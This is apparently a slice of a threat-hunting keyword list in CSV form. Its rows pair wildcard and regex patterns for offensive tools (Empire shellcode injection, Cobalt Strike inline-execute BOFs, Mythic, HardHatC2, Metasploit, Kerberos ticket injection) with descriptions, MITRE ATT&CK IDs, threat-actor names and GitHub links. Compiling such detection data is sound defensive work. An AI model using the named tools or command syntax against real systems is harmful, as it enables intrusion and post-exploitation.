"*Inject-LocalShellcode*",".{0,1000}Inject\-LocalShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48548"
"*InjectMate.py*",".{0,1000}InjectMate\.py.{0,1000}","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","48549"
"*InjectMateCommunity.py*",".{0,1000}InjectMateCommunity\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","48550"
"*Inject-NetRipper*",".{0,1000}Inject\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48551"
"*Injector.exe*",".{0,1000}Injector\.exe.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","N/A","3","241","85","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z","48552"
"*injector.ps1*.kirbi*",".{0,1000}injector\.ps1.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","48553"
"*InjectPERemote.cs*",".{0,1000}InjectPERemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48554"
"*InjectPEWMIFSRemote*",".{0,1000}InjectPEWMIFSRemote.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48555"
"*injectremote.boo*",".{0,1000}injectremote\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48556"
"*Inject-RemoteShellcode *",".{0,1000}Inject\-RemoteShellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48557"
"*Inject-RemoteShellcode*",".{0,1000}Inject\-RemoteShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48558"
"*inject-shellcode *",".{0,1000}inject\-shellcode\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48559"
"*injectShellcode*",".{0,1000}injectShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","48560"
"*InjectShellcode*",".{0,1000}InjectShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","48561"
"*InjectShellCode.cs*",".{0,1000}InjectShellCode\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48562"
"*InjectShellCodeRemote.cs*",".{0,1000}InjectShellCodeRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48563"
"*InjectShellCodeWMIFSB64*",".{0,1000}InjectShellCodeWMIFSB64.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","48564"
"*injectsu.dll*",".{0,1000}injectsu\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48565"
"*InjectTicket*ptt /ticket:*",".{0,1000}InjectTicket.{0,1000}ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","48566"
"*inline_assembly -Assembly *",".{0,1000}inline_assembly\s\-Assembly\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","48568"
"*InlineAssembly(""Plugins\\Scheduled.exe*",".{0,1000}InlineAssembly\(\""Plugins\\\\Scheduled\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","48569"
"*inlineAssembly*/execmethod*",".{0,1000}inlineAssembly.{0,1000}\/execmethod.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48570"
"*inlineDll*/dll*",".{0,1000}inlineDll.{0,1000}\/dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48571"
"*inline-exec.py*",".{0,1000}inline\-exec\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","48572"
"*inline-execute *",".{0,1000}inline\-execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","48573"
"*inline-execute *.o*",".{0,1000}inline\-execute\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48574"
"*inline-execute *tokenprivileges.o*",".{0,1000}inline\-execute\s.{0,1000}tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","48575"
"*inline-execute StartWebClientSvc.x64.o*",".{0,1000}inline\-execute\sStartWebClientSvc\.x64\.o.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","48576"
"*inline-execute*whereami.x64*",".{0,1000}inline\-execute.{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","48577"
"*inlineExecute.nim*",".{0,1000}inlineExecute\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48578"
"*InlineExecute-Assembly*",".{0,1000}InlineExecute\-Assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","48579"
"*InlineShellcode*",".{0,1000}InlineShellcode.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48580"
